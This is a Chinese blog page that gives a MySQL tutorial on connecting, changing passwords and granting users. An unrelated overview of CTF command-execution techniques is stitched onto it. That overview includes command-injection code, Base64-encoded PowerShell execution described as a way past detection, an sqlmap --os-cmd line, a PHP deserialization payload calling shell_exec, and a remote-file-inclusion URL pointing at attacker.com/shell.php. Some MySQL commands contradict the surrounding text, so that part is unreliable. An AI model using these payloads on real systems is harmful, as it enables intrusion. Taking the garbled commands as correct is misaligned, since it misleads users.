【MySql-Command】-MySql-Enter

本文介绍如何连接本地及远程MySql数据库,包括连接命令的格式、参数说明及实例演示。此外,还详细讲解了如何修改密码及增加新用户的方法。

连接到MySql


格式: mysql -h主机地址 -u用户名 -p用户密码


1、连接到本机上的MYSQL:


首先打开DOS窗口,然后进入目录mysql\bin,再键入命令mysql -u root -p,回车后提示你输密码.注意用户名前可以有空格也可以没有空格,但是密码前必须没有空格,否则让你重新输入密码。


如果刚安装好MYSQL,超级用户root是没有密码的,故直接回车即可进入到MYSQL中了,MYSQL的提示符是: mysql>

2、连接到远程主机上的MYSQL:

假设远程主机的IP为:110.110.110.110,用户名为root,密码为abcd123。

则键入以下命令:

mysql -h110.110.110.110 -u root -p 123;

(注:u与root之间可以不用加空格,其它也一样)


3、退出MYSQL命令: 

exit (回车)


修改密码:


格式:mysqladmin -u用户名 -p旧密码 password 新密码

1、给root加个密码root2

首先在DOS下进入目录mysql\bin,然后键入以下命令
    mysqladmin -u root -password root2
注:因为开始时root没有密码,所以-p旧密码一项就可以省略了。

2、再将root的密码改为djg345。
    mysqladmin -u root -p root2 password root3

增加新用户:

注意:和上面不同,下面的因为是MYSQL环境中的命令,所以后面都带一个分号作为命令结束符

格式:grant select on 数据库.* to 用户名@登录主机 identified by “密码”

1、增加一个用户test1密码为abc,让他可以在任何主机上登录,并对所有数据库有查询、插入、修改、删除的权限。
     首先用root用户连入MYSQL,然后键入以下命令:
     
     grant select,insert,update,delete on *.* to [email=test1@”%]test1@”%[/email]” Identified by “abc”;

但增加的用户是十分危险的,你想如某个人知道test1的密码,那么他就可以在internet上的任何一台电脑上登录你的mysql数据库并对你的数据可以为所欲为了

2、增加一个用户test2密码为abc,让他只可以在localhost上登录,并可以对数据库mydb进行查询、插入、修改、删除的操作(localhost指本地主机,即MYSQL数据库所在的那台主机)
    这样用户即使用知道test2的密码,他也无法从internet上直接访问数据库,只能通过MYSQL主机上的web页来访问了。
    grant select,insert,update,delete on mydb.* to [email=test2@localhost]test2@localhost[/email] identified by “abc”;

     如果你不想test2有密码,可以再打一个命令将密码消掉。
    grant select,insert,update,delete on mydb.* to [email=test2@localhost]test2@localhost[/email] identified by “”;


### CTF中执行命令技术的概述 在CTF(Capture The Flag)竞赛中,执行命令技术是攻击者用来控制目标系统的关键技能之一。以下是一些常见的技术及其应用场景: #### 1. 命令注入 命令注入是一种常见的漏洞利用技术,攻击者通过向应用程序输入恶意命令来执行系统命令。例如,在Web应用中,如果用户输入直接被传递到系统命令行而没有经过适当验证或转义,则可能导致命令注入。 示例代码: ```python import os command = "ping " + input("Enter IP: ") os.system(command) ``` 上述代码中,如果用户输入为 `; ls`,则会执行额外的 `ls` 命令[^3]。 #### 2. PowerShell混淆与执行 PowerShell脚本因其强大的功能和灵活性,常被用作执行命令的工具。通过混淆技术,可以隐藏恶意脚本的真实意图。例如,使用Base64编码将脚本转换为不可读的形式,然后通过`powershell.exe -EncodedCommand`参数执行。 示例代码: ```powershell $encodedCommand = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes("Write-Host 'Hello World'")) powershell.exe -EncodedCommand $encodedCommand ``` 这种方式可以绕过某些安全检测机制[^1]。 #### 3. SQL注入与命令执行 SQL注入不仅可以用于访问数据库中的敏感信息,还可以通过特定数据库(如MySQL、PostgreSQL)的特性执行操作系统命令。例如,`sqlmap`工具可以通过指定参数自动探测并利用SQL注入漏洞。 示例命令: ```bash sqlmap -u "http://example.com/vuln.php?id=1" --os-cmd="whoami" ``` 该命令尝试通过SQL注入执行`whoami`命令[^2]。 #### 4. 反序列化漏洞 反序列化漏洞允许攻击者通过构造恶意数据触发远程代码执行。例如,Java、PHP等语言的反序列化过程中可能引入命令执行风险。 示例代码: ```php <?php class SystemExec { public $cmd; function __destruct() { shell_exec($this->cmd); } } $payload = urlencode(serialize(new SystemExec('id'))); file_put_contents('input.txt', $payload); ?> ``` 通过构造特定的序列化数据,可以实现远程命令执行[^4]。 #### 5. 文件包含漏洞 文件包含漏洞(LFI/RFI)允许攻击者加载并执行本地或远程文件。如果加载的文件包含恶意代码,则可能导致命令执行。 示例URL: ``` http://example.com/vuln.php?page=http://attacker.com/shell.php ``` 该请求可能会导致`shell.php`中的恶意代码被执行[^5]。 --- ### 相关问题
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值